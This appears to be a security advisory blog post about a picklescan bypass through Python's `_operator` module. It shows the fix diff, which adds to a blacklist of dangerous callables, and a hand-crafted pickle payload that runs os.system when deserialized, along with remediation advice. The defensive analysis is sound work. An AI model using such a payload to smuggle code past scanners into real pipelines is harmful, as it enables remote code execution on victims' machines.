Picklescan, a security scanner for Python pickle files, had a blind spot. It didn't check for dangerous functions in the C-optimized `_operator` module. This allowed attackers to craft malicious pickles that bypassed the scan and achieved Remote Code Execution. Update to version 0.0.34 immediately.
The Picklescan library, a tool designed to detect malicious Python pickle files, contained a critical vulnerability allowing for Remote Code Execution (RCE). The flaw stemmed from an incomplete blacklist that failed to account for dangerous functions within Python's C-optimized `_operator` module. Attackers could craft a pickle payload using `_operator.methodcaller` or `_operator.attrgetter` to bypass Picklescan's checks, leading to arbitrary command execution when the seemingly 'safe' file was deserialized by a victim application.
Ah, Python's pickle module. The duct tape of data serialization. It's quick, it's easy, and it's a security nightmare waiting to happen. Deserializing a pickle is functionally equivalent to running arbitrary code, making it one of the most notorious footguns in the Python ecosystem. Anyone who tells you to pickle.load() data from an untrusted source is either a rookie or trying to get you fired.
To solve this, heroes emerge with tools like picklescan. Its mission is noble: to statically analyze a pickle file's bytecode and identify dangerous opcodes or calls to unsafe functions like os.system before you naively load it into memory. It acts as a bouncer, checking IDs at the door to keep the malicious riff-raff out.
This is especially critical in the world of Machine Learning, where models are passed around like candy, often serialized as... you guessed it, pickle files. A tool like picklescan provides a desperately needed layer of security, giving developers the confidence to load third-party models without handing over the keys to their kingdom. But what happens when the bouncer has a blind spot?
The Achilles' heel of any blacklist-based security tool is the simple fact that you can only block what you know. If an attacker finds a new trick, a new gadget, or an overlooked pathway, the entire security model collapses. This is precisely what happened to picklescan.
The developers diligently blacklisted dangerous functions from the standard Python operator module, such as methodcaller and attrgetter. These are powerful tools that, in the wrong hands, can be used to call arbitrary methods on any object. However, they overlooked one crucial detail: Python often has C-optimized versions of standard libraries for performance. The operator module has a C-based twin named _operator.
This is like a high-security facility having photos of every known criminal, but failing to account for their identical twin. An attacker could simply use the c_operator opcode in their pickle file to access the functions in the _operator module. Since _operator wasn't on the naughty list, picklescan saw no evil, heard no evil, and reported the malicious file as perfectly safe. The front door was locked, but the side window, conveniently labeled _operator, was wide open.
Code tells the story best. The vulnerability lived in src/picklescan/scanner.py, inside a dictionary named _unsafe_globals. This dictionary is the bouncer's list of troublemakers. Before the fix, it was blissfully unaware of the _operator module's existence.
The patch, committed in f2dea43e0c838e09ace1e62994143254b51de927, is beautifully simple and terrifyingly revealing. It adds just a few lines to the blacklist.
--- a/src/picklescan/scanner.py
+++ b/src/picklescan/scanner.py
@@ -127,6 +129,11 @@
"numpy.testing._private.utils": "*", # runstring() in this module is a synonym for exec()
"nt": "*", # Alias for 'os' on Windows. Includes os.system()
"posix": "*", # Alias for 'os' on Linux. Includes os.system()
+ "_operator": {
+ "attrgetter", # Ex of code execution: operator.attrgetter("system")(__import__("os"))("echo pwned")
+ "itemgetter",
+ "methodcaller",
+ },
"operator": {
"attrgetter", # Ex of code execution: operator.attrgetter("system")(__import__("os"))("echo pwned")
"itemgetter",That's it. The addition of the _operator dictionary key, with its dangerous callables attrgetter and methodcaller, closes the loophole. It's a stark reminder that in security, completeness is everything. Missing a single, obscure variant of a dangerous function is all it takes for a determined attacker to walk right past your defenses.
So, how does an attacker turn this oversight into a shell? The PoC is a masterclass in pickle bytecode manipulation. Since pickle.dumps() is too high-level to create this specific payload, it has to be built manually, opcode by opcode. It's the assembly language of Python serialization.
Let's look at the payload:
opcode2 = b'''cbuiltins
__import__
(Vos
tRp0
0c_operator
methodcaller
(Vsystem
Vecho "pwned by _operator.methodcaller"
tR(g0
tR.'''This isn't just a string; it's a program. The pickletools.dis() function can help us decode it. The payload first pushes the builtins.__import__ function onto the stack and calls it with the argument 'os', effectively getting a handle to the OS module. Then, it uses the c_operator opcode to grab _operator.methodcaller. It configures methodcaller to call a method named system. Finally, it applies this configured methodcaller to the os module it imported earlier, executing os.system('echo "pwned..."'). Voila, RCE.
To a vulnerable version of picklescan, this looks fine. It sees __import__ which is suspicious, but it completely misses the _operator.methodcaller gadget that ties it all together into a weapon. The scanner flags a minor warning but misses the critical RCE vector, giving the user a false sense of security.
The impact here is as bad as it gets: total system compromise. An attacker can package this malicious pickle file into a format that a victim would trust, like a pre-trained machine learning model from a public repository.
Imagine a data scientist downloading the latest, greatest AI model to analyze some data. They do their due diligence and run picklescan on the .pkl file. The scanner says, "Looks a bit suspicious, but no major threats detected!" The data scientist, reassured, loads the model with pickle.load(). In the background, their server connects back to an attacker's C2, and their company's proprietary data starts streaming out. Game over.
This isn't theoretical. The entire MLOps pipeline, from model sharing to deployment, is built on a foundation of trust that often involves pickle files. A vulnerability like this undermines that foundation. It turns a helpful security tool into an unwitting accomplice, assuring victims that the Trojan horse they're wheeling into their datacenter is just a lovely wooden statue.
The immediate fix is simple: upgrade picklescan to version 0.0.34 or later. This version adds _operator to its blacklist, slamming the door on this specific exploit vector. Do it now.
pip install --upgrade picklescanBut let's be real. The core problem isn't this specific bug; it's the fragile security model of blacklisting dangerous things in a format as powerful as pickle. As the original researchers noted, there could be other gadgets lurking in the standard library, other obscure modules or clever chains of 'safe' operations that lead to RCE. The next bypass is always just one creative hacker away.
The real lessons are harsher. First, never, ever deserialize data from a source you don't 100% control and trust. Second, if you must handle untrusted pickles, do it in a heavily sandboxed, disposable environment with no network access and minimal privileges. Third, and most importantly, consider using safer serialization formats. JSON, Protobuf, or even yaml.safe_load() don't have the arbitrary code execution capabilities that make pickle so treacherous. It might be time to let pickle go.
| Product | Affected Versions | Fixed Version |
|---|---|---|
picklescan mmaitre314 | < 0.0.34 | 0.0.34 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-502 |
| Weakness | Deserialization of Untrusted Data |
| Attack Vector | Network / File |
| CVSSv3.1 Score | 9.3 (Critical) |
| Impact | Remote Code Execution |
| Exploit Status | Proof-of-Concept Available |
| KEV Status | Not Listed |
The software deserializes untrusted data without sufficiently verifying that the resulting data will be valid, leading to arbitrary code execution.
Get the latest CVE analysis reports delivered to your inbox.